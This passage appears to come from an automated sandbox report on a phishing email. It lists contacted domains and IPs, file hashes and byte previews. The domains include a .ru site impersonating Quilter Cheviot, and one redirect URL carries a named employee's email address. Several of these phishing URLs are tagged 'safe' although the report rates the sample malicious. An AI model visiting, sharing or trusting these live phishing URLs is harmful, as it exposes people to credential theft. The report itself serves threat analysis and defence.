                                                              https://quiltercheviot.uuvght.ru/rq6hFLBxsRd99C5DxuUMgquYKDtkJqNXasAmjDrY34q9gytrue
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://quiltercheviot.uuvght.ru/qrP6RmVW07q5q2IzmAMefCmNGikm8kh7E6AP45140true
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://quiltercheviot.uuvght.ru/favicon.icotrue
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://quiltercheviot.uuvght.ru/GDSherpa-vf2.woff2true
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://quiltercheviot.uuvght.ru/kljLcPWShXHXVYYUU12tSUDv56HXYBL0GF0xXh47yqPLMdA7Eah01QPwx220true
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://quiltercheviot.uuvght.ru/GDSherpa-regular.wofftrue
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallbackfalse
                                                                high
                                                                https://quiltercheviot.uuvght.ru/ij4ju2f5snoNTxMCJrxIedZBHZMU2Iz4yXZa0cdKQl2fDm9jTZe4c7rlVqysESBB56169true
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://quiltercheviot.uuvght.ru/qrNROqivBHGeLbBOhClY7GZWtq7YPg4tOUKDNS8VcsMyYNAuvDqOSMcRbEguUbLoPuu0pdeAHcd240true
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://y13tzxbjz1.moydow.de/DzC0pn01Csl0xBhEB8ZuBtzVkjUWPyAfYsoLARTnALcLCFnUCNW3DjobhQoJgtJFVwG9u3yxgKVJMxgGbRx2il5WBIbQaIcwT3MQa1jsOGLaAtedE1h9IThKR1LyVBhvwGIHHPsd60cpE2A5rtuhv6I2WjwtnliaqoT9XvtUNVLGJLs5tZQLcBfyptubL9vuVj1dixwg/dOGmOwe0jJcVHNyok9MfrN8x9KudV9hVKZoxRp1y2BOwFcLtHoWhYg7sREANrsfv3A5AfpiuKKaytzguSjLIsQ5RSezJDRkc6zjndnbLTWsxuI8keuUDUfnjzGiSaqgraw5zZ8KKB2TN4ykt2uTP8cCO2lsCahG3cVrtiyW29K12PSaLO0lWjUIFTWblxnTfKoo78ZNc/richard.thorn@quiltercheviot.comfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.cssfalse
                                                                  high
                                                                  https://quiltercheviot.uuvght.ru/rshshJxZMD4moUnXROrGzvb6fdlKwG3xxgQnZl0THijFV3HtosSsaMM0Gw6eHHMCef192true
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://quiltercheviot.uuvght.ru/xyrN6azxUjCRpqSzcd26true
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://developers.cloudflare.com/favicon.pngfalse
                                                                    high
                                                                    https://quiltercheviot.uuvght.ru/xhSSG433q0vLfXw282T0j4tZVT2ieEywR92lVD7p2BPMjtlA0PeiEbuzktrue
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://challenges.cloudflare.com/turnstile/v0/g/f3b948d8acb8/api.jsfalse
                                                                      high
                                                                      https://quiltercheviot.uuvght.ru/klet11CCZk79YbQutqnTSKM1JZecexnomL2CqqrpyZHGyJ74c2fkogJFPjUKjFZ1HDbo2ab224true
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://quiltercheviot.uuvght.ru/GDSherpa-vf.woff2true
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://quiltercheviot.uuvght.ru/efxsGgZ9g96NYVuIvRwEYQSx0A8SVy5blklUrKSSj9iyc6co8Jt78146true
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://quiltercheviot.uuvght.ru/GDSherpa-regular.woff2true
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://quiltercheviot.uuvght.ru/ghiYmnsgxfRBtGaEoscjiskLiru2jTJXevHbPWHxkFklSwGnOZswRieoV0kMZoDk6v12210true
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://aadcdn.msauthimages.net/c1c6b6c8-rch2ljmfhhrlo6pwildmnbetzhhtpmipoxqhg8ezr8m/logintenantbranding/0/illustration?ts=636723567836061241false
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://get.geojs.io/v1/ip/geo.jsonfalse
                                                                        high
                                                                        https://quiltercheviot.uuvght.ru/GDSherpa-bold.wofftrue
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://quiltercheviot.uuvght.ru/56ybfCjabGpJyUZ8916true
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://fkbmp45xuukobliimngz8fszwpth2x9p8sp66fi21zoxkwiyhlosfjl.erisxw.es/EOYjycEWqYUAcxcvGlGTovlvIGfUMCJNEJFKBSPXRJBLBPDZUIFSCIPEEVRBVJVS12TNTVFKSUWpd78P86Oqr50false
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs
                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        142.250.185.206
                                                                        unknownUnited States
                                                                        15169GOOGLEUSfalse
                                                                        104.18.94.41
                                                                        challenges.cloudflare.comUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        13.33.187.14
                                                                        d19d360lklgih4.cloudfront.netUnited States
                                                                        16509AMAZON-02USfalse
                                                                        104.26.1.100
                                                                        get.geojs.ioUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        104.21.80.1
                                                                        unknownUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        142.251.168.84
                                                                        unknownUnited States
                                                                        15169GOOGLEUSfalse
                                                                        142.250.181.238
                                                                        unknownUnited States
                                                                        15169GOOGLEUSfalse
                                                                        185.199.109.133
                                                                        objects.githubusercontent.comNetherlands
                                                                        54113FASTLYUSfalse
                                                                        151.101.194.137
                                                                        code.jquery.comUnited States
                                                                        54113FASTLYUSfalse
                                                                        104.16.6.189
                                                                        unknownUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        35.190.80.1
                                                                        a.nel.cloudflare.comUnited States
                                                                        15169GOOGLEUSfalse
                                                                        52.123.131.14
                                                                        s-0005.dual-s-dc-msedge.netUnited States
                                                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                        142.250.184.228
                                                                        www.google.comUnited States
                                                                        15169GOOGLEUSfalse
                                                                        104.17.24.14
                                                                        cdnjs.cloudflare.comUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        104.16.3.189
                                                                        developers.cloudflare.comUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        104.21.32.1
                                                                        fkbmp45xuukobliimngz8fszwpth2x9p8sp66fi21zoxkwiyhlosfjl.erisxw.esUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        140.82.121.4
                                                                        github.comUnited States
                                                                        36459GITHUBUSfalse
                                                                        142.250.185.138
                                                                        unknownUnited States
                                                                        15169GOOGLEUSfalse
                                                                        188.114.97.3
                                                                        v36ix.szsnqp.ruEuropean Union
                                                                        13335CLOUDFLARENETUStrue
                                                                        104.21.13.170
                                                                        unknownUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        188.114.96.3
                                                                        unknownEuropean Union
                                                                        13335CLOUDFLARENETUSfalse
                                                                        172.67.70.233
                                                                        unknownUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        52.109.76.144
                                                                        unknownUnited States
                                                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                        95.101.182.112
                                                                        e329293.dscd.akamaiedge.netEuropean Union
                                                                        20940AKAMAI-ASN1EUfalse
                                                                        13.69.116.107
                                                                        unknownUnited States
                                                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                        IP
                                                                        192.168.2.18
                                                                        Joe Sandbox version:42.0.0 Malachite
                                                                        Analysis ID:1641941
                                                                        Start date and time:2025-03-18 16:21:20 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:8
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • EGA enabled
                                                                        Analysis Mode:stream
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:message__0XSkcQEiS5ehXOfhSk9JKw_geopod_ismtpd_30_.eml
                                                                        Detection:MAL
                                                                        Classification:mal100.phis.evad.winEML@25/36@46/110
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .eml
                                                                        • Exclude process from analysis (whitelisted): svchost.exe
                                                                        • Excluded IPs from analysis (whitelisted): 40.69.42.241
                                                                        • Excluded domains from analysis (whitelisted): ecs.office.com, fe3.delivery.mp.microsoft.com, dual-s-0005-office.config.skype.com, glb.cws.prod.dcat.dsp.trafficmanager.net, ecs.office.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Report size getting too big, too many NtSetValueKey calls found.
                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        • VT rate limit hit for: quiltercheviot.uuvght.ru
                                                                        • VT rate limit hit for: y13tzxbjz1.moydow.de
                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                        File Type:data
                                                                        Category:modified
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):4.491638794581654
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:86A4A51EB6491AFE94528EE1379A78A6
                                                                        SHA1:52BEF1FF9BC66F76B0F741C839F67C048AB2C341
                                                                        SHA-256:F19C28ED0D38E14EDC84A7E71E17A429FF011017EFD2601C16D94138C0D3D9A9
                                                                        SHA-512:E887B4538CC41180C5B97B6A5609140DA8823A423F2EA3E4BC14D1B704697683C1DDEA5E6D4D47C866BF871E4F873FB748A9F35D518DF2CFA55D0D77B6FC1416
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:............................................................................`............# .....................eJ..............Zb..2...................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1..............................................................\6............# .............v.2._.O.U.T.L.O.O.K.:.9.a.4.:.9.1.7.a.7.a.6.c.5.e.9.2.4.e.6.c.8.8.7.a.2.5.2.7.c.7.9.8.0.e.2.5...C.:.\.U.s.e.r.s.\.n.o.r.d.i.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.u.t.l.o.o.k. .L.o.g.g.i.n.g.\.O.U.T.L.O.O.K._.1.6._.0._.1.6.8.2.7._.2.0.1.3.0.-.2.0.2.5.0.3.1.8.T.1.1.2.2.1.4.0.6.1.9.-.2.4.6.8...e.t.l.......P.P..........# .............................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                        Category:dropped
                                                                        Size (bytes):9648
                                                                        Entropy (8bit):7.9099172475143416
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:4946EB373B18D178C93D473489673BB6
                                                                        SHA1:16477ACB73B63CA251D37401249E7E4515FEBD24
                                                                        SHA-256:666BC574C9F3FB28A8AC626FA8105C187C2A313736494A06BD5A937473673C92
                                                                        SHA-512:F684B90B748DC8399F76C5D8F94AF6C4E6869143F18D19CE435B25EAA14E9647B120467BDD0795895676DC0CCCDEABF82BEB2F46CE2C5BF4C58ED9C134F30C48
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:RIFF.%..WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH......0....n.mu..G..t042.....@...`[...%...6....9AD.'@.,f.B...+..+..+..W&.p.....h.......f.-...+.....m...n....E....O].+R.&Q..#.X.ip4..p......\O...\/....9.5.a..DfZ,K....8.....Z..2..z......t.......|.I.(..6E.D.}.C..OQD$S}iZ...[D.......q`(...@../.NQ......+"b%.X.D".G.*...0G...".2........x.O......7......E..&....e.F..4...K>.M..Pd.B...@'o./te..[.f....4[..a..x...9#.@$.=...t..=..t_.W....[..f.|fv...N...c6..k4}.9.7.....f.F3.4[...a...;.m.@N.n.0.....n.G[c.H.}..t.{..;....G...2.::..].0....
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 28584, version 1.66
                                                                        Category:downloaded
                                                                        Size (bytes):28584
                                                                        Entropy (8bit):7.992563951996154
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:17081510F3A6F2F619EC8C6F244523C7
                                                                        SHA1:87F34B2A1532C50F2A424C345D03FE028DB35635
                                                                        SHA-256:2C7292014E2EF00374AEB63691D9F23159A010455784EE0B274BA7DB2BCCA956
                                                                        SHA-512:E27976F77797AD93160AF35714D733FD9E729A9981D8A6F555807981D08D8175E02692AA5EA6E59CEBD33895F5F6A3575692565FDD75667630DAB158627A1005
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://quiltercheviot.uuvght.ru/GDSherpa-regular.woff2
                                                                        Preview:wOF2......o.......6x..oG...B.......................>....`..<.<..b.....h..B.6.$..x..>.. ..'..{...[x"q..].....hJ....'.......6.2.[....q....z..mCww...*.eU..S.........0..S.s..,....\.e..F.&....oU*R.}Q.C..2.TD....5..#..h.H.2.|<.1.z..].xZ...z..z..W.........p%..F.e.r"yG.......f.M3.].U.p...E..<..:..j..E......t....!....~a...J.m....f.d.eE..>.:.9.....,6K{.q..6e..4:z......{.{....$.. ...B....9:0.G..6.9R....m..jCW.m.]:{.p..?P.O.B..E....u.J.._..........dd=. l..SJ..fjm....\....)...6......mV.`.J.R.A..R.....J...T.y.........m...k-....{'.Ud"...C.$d*.N 9}.N]..2p.q.T..6.-A.U...."..o.\......uh...$..4j..v...9....anl/NT....K....k..A...........U5S.=.t[.)/s.R.......F..)6H A..'?!....7S.....w:.%.H.@...l?...lm..lUd D...-.... .......5).`..w&..Q....-.. ...9.Xt./SQ?.s+u.9..\.h.l.G.#.*..#@.F..f.1.f..=`....p.....=c..f=..p 4By.u.z'...$;.s.....z.....X..n6y-...........<.......X......~+j.z.j.......7.PD..O..w..9..8].!~C&.......*LCE..Nf~.N.eJ.iXnX*C.&....t.U..Nr.@..lZ.... .X..
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 280 x 60, 8-bit/color RGBA, non-interlaced
                                                                        Category:downloaded
                                                                        Size (bytes):3335
                                                                        Entropy (8bit):7.920585736827683
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:DADCD54EE1BF8A260ED5289122D2FF93
                                                                        SHA1:5B359651C028A86C3E6FDD6223B8362C065DECE6
                                                                        SHA-256:0C2C1041650B139AA47E016BDB95163F97384487A1858F85760792862FDAAC3F
                                                                        SHA-512:ED53D5EB181D12539597E23CE96721F954052B8535A0801A1380F7F677B08346B56AFA842ACB42AD4ABBB822C01BBAC0BB3052D61B2D6E3FB04849EBE6C3CB7F
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://aadcdn.msauthimages.net/c1c6b6c8-rch2ljmfhhrlo6pwildmnbetzhhtpmipoxqhg8ezr8m/logintenantbranding/0/bannerlogo?ts=636723630488940825
                                                                        Preview:.PNG........IHDR.......<............sRGB.........gAMA......a.....pHYs..........(J.....IDATx^....W...Q.@rXPh...P......M<....X..%.a..m1..Mli..`..6..;..5..[........(..-$BK.i.3..*I....73........~.dso.vwfg....}.{.\.... .B.|D...AH....3x..u.9..O.v..._=+....H....8..sz..:....}...?8..Ov.P..*0t..wN..s'.....Ic.v&...m..o.{......9yp.Z9...A.F.u...Dd.....N..I.&...A.5q......b........8..|.i.L..Z.........".#.:%........<..o...6.KN..%..M..a.....:.........M-.|O.....r6..k..G.F.uJ..G^..l~....,..m..[#z.C`..j.h..p.....K...K...p..o......j.D.CgY...B....s.:.a.8w;)/.:....`...:...m...v....a8n...3F..AD`.Z'.4...SN..o..e...;;..@...X..WnQ[..iW.z...............1...SnP-A./b...FS..L...8;.ot.\.Qw...*}..:.;.{VM......M`.6LR-A./......~..T[..q.......%....G..6aExM...c.%..E...iJ.E...........Z.`5..a.............\UAjA..V.AT.u...:A!H..pm?..}..o.....u.xlj..........."./YZ T.V.!.%.S....z.h..X.F ....<........}.k.P..p...Bp]......M.aK.kV.lX8.P|....../..n..r./3..j.(0X.......f."...A.Yb....5.E..l.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                        Category:dropped
                                                                        Size (bytes):17842
                                                                        Entropy (8bit):7.821645806304586
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:4B52ECDC33382C9DCA874F551990E704
                                                                        SHA1:8F3BF8E41CD4CDDDB17836B261E73F827B84341B
                                                                        SHA-256:CCE050CC3B150C0B370751021BB15018EE2B64AC369E230FE3B571A9B00D4342
                                                                        SHA-512:AC3D3C82BAD9147AE5F083ED49C81A744F672DDFBB262135AA3F2C6601F8DFFEA11D8E323CEF025C36D76C6F2515AA6814B622CF504CA01D13346E9EA989048F
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:RIFF.E..WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH.,...$.m.8..k.\.oDL.. ..TU....3'.{.g..6..2...6.DL`e..."&@..b.#&@......T.....'.....$......1.d...G........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........._...........................?...Z5[...B,.c...V-...m.0.../..?...............?.......?................_.....-...M.B.....=....C...[......w .X...ea.............VW.?b....[[.o^.Y.K...OD
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):48316
                                                                        Entropy (8bit):5.6346993394709
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:2CA03AD87885AB983541092B87ADB299
                                                                        SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                        SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                        SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                        Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:SVG Scalable Vector Graphics image
                                                                        Category:dropped
                                                                        Size (bytes):268
                                                                        Entropy (8bit):5.111190711619041
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:59759B80E24A89C8CD029B14700E646D
                                                                        SHA1:651B1921C99E143D3C242DE3FAACFB9AD51DBB53
                                                                        SHA-256:B02B5DF3ECD59D6CD90C60878683477532CBFC24660028657F290BDC7BC774B5
                                                                        SHA-512:0812DA742877DD00A2466911A64458B15B4910B648A5E98A4ACF1D99E1220E1F821AAF18BDE145DF185D5F72F5A4B2114EA264F906135F3D353440F343D52D2E
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill="#404040"/></svg>
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 420 x 94, 8-bit/color RGBA, non-interlaced
                                                                        Category:downloaded
                                                                        Size (bytes):10796
                                                                        Entropy (8bit):7.946024875001343
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:12BDACC832185D0367ECC23FD24C86CE
                                                                        SHA1:4422F316EB4D8C8D160312BB695FD1D944CBFF12
                                                                        SHA-256:877AE491D9AAC5C6EF82A8430F9F652ACE8A0DBC7294BD112AAD49BD593769D0
                                                                        SHA-512:36C319AC7F75202190E7A59F3F3C92892A71D5F17663E672319A745B6574BCFDE7C89B35F480CB15A193924DACB9D67F8CA1E1BC2BF33FC5CCBFA152CC7BA2D0
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7
                                                                        Preview:.PNG........IHDR.......^.....l2`...).IDATx..}...U.... w...B..P$.Hv..t......x.EA@.Q`.E......-.".(..X`..D....5]]U}....$3...&...guOw..}>.....~....w.ZZ...z..FZ$I.$I....N.......tt.$e...M....ru$I.$IR.h.AvK0.t..wy.:.1...D.H...LS....iF~.X...smr.$I.$IR.4.....SY..@....h8.....*..dB...1.eG...$I.$.hZ...8.r...[.A.I..XE..hdA{Z..teaF...u:}.1^..-I.$I.FP.A..Nm..........A78...=.%W_.$I..8YQ.H2z#.D_...m..k..u.t..R6#.....N....){...$I..1@...g...@a ..u2..dL...*ai.d.[.$I..D.....OM..a...,h%u.B.....0...57..hrW..$I....Gf.|.=.eg`.........k.J.$IR..<.u....]....@.d...H..$I.$5..MWwu:....H|Y..,.$.I.$I....Qu...s.NzzM..]..;$ I.$IR......+..L9......63.I@.$I..z..#.....:..7...s..<$ I.$I.hP.tu...m"..o1.y.@..W1T<(..... z%."?.4zE..$ ..Y1z`.P..!....`t%t....[..d...N.UKy&.A;..6S...<...........o...]0...r.$I......0..R.....N.....0Wi._.;...M..Lrb{.7w..].jm.r....C...&..gd}..Etm}..~L.l...}n\'...$..Mr.i..{..n..9.....SwMh.}.Q{./wJ.....B]:.....+..\V...A.S.w..6.....,..[.......J@....-.4.....:..Zvt.r.*.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (10017)
                                                                        Category:downloaded
                                                                        Size (bytes):10245
                                                                        Entropy (8bit):5.437589264532084
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:6C20A2BE8BA900BC0A7118893A2B1072
                                                                        SHA1:FF7766FDE1F33882C6E1C481CEED6F6588EA764C
                                                                        SHA-256:B1C42ACD0288C435E95E00332476781532ED002CAC6F3DCEE9110CED30B31500
                                                                        SHA-512:8F80AD8ADC44845D24E13D56738A2CA2A73EE6FCDC187542BA4AAEBBF8817935D053A2ACFB0D425B9CC0C582B5091E1C9FE16B90B3AA682187645067C267FC41
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://objects.githubusercontent.com/github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250318%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250318T152121Z&X-Amz-Expires=300&X-Amz-Signature=740f45a720998c47938f1f35aa27b630e9cecf67a7bc9d7db99a8bfda1749aba&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream
                                                                        Preview://.// randexp v0.4.3.// Create random strings that match a given regular expression..//.// Copyright (C) 2016 by Roly Fentanes (https://github.com/fent).// MIT License.// http://github.com/fent/randexp.js/raw/master/LICENSE .//.!function(){var e="RandExp",t=function(){return function e(t,n,r){function o(s,i){if(!n[s]){if(!t[s]){var u="function"==typeof require&&require;if(!i&&u)return u(s,!0);if(a)return a(s,!0);var p=new Error("Cannot find module '"+s+"'");throw p.code="MODULE_NOT_FOUND",p}var h=n[s]={exports:{}};t[s][0].call(h.exports,function(e){var n=t[s][1][e];return o(n?n:e)},h,h.exports,e,t,n,r)}return n[s].exports}for(var a="function"==typeof require&&require,s=0;s<r.length;s++)o(r[s]);return o}({1:[function(e,t,n){function r(e){return e+(e>=97&&122>=e?-32:e>=65&&90>=e?32:0)}function o(){return!this.randInt(0,1)}function a(e){return e instanceof h?e.index(this.randInt(0,e.length-1)):e[this.randInt(0,e.length-1)]}function s(e){if(e.type===p.types.CHAR)return new h(e.value);if(e.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):128
                                                                        Entropy (8bit):4.750616928608237
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:D90F02F133E7B82AF89B3E58526AC459
                                                                        SHA1:F1D6D47EFE0D920F5BC5024E813554BD2F8A1650
                                                                        SHA-256:FCF0826E3EA7D24F6C73417BFF62AD84191ECC837DBFB10E60A2547580C3C14D
                                                                        SHA-512:83C187216CE1B44E23000DF4F25A4BAA7C5E0066E62C3E0D0203B013B5C26D097C6B225C58E345204B47E5E7BF34D4A8E60F7DF63D6083157C6CB9707DD9C41E
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIgCT9uB0CLw6tjEgUNX1f-DRIFDRObJGMhhg1XGbYTmkgSSgmWqyHkTjQhbRIFDc8jKv8SBQ3Fk8QkEgUNiaVnyxIFDcMZOZASBQ2JpWfLEgUNwxk5kBIFDdACQOwSBQ2oXeN0ISxE7WZQD-ba?alt=proto
                                                                        Preview:ChIKBw1fV/4NGgAKBw0TmyRjGgAKSAoHDc8jKv8aAAoHDcWTxCQaAAoHDYmlZ8saAAoHDcMZOZAaAAoHDYmlZ8saAAoHDcMZOZAaAAoHDdACQOwaAAoHDahd43QaAA==
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                        Category:dropped
                                                                        Size (bytes):1298
                                                                        Entropy (8bit):6.665390877423149
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:32CA2081553E969F9FDD4374134521AD
                                                                        SHA1:7B09924C4C3D8B6E41FE38363E342DA098BE4173
                                                                        SHA-256:216FC342A469AA6A005B2EACC24622095E5282D3E9F1AE99CE54C27B92EC3587
                                                                        SHA-512:F75749C6344FCD7BF06872A3678BB2EB4CAE2DDC31CC5D1EE73EFBA843705577841667733A83163AF4336EC8A32DF93E7A36155BD6282D7BB86159644975948C
                                                                        Malicious:false
                                                                        Reputation:unknown
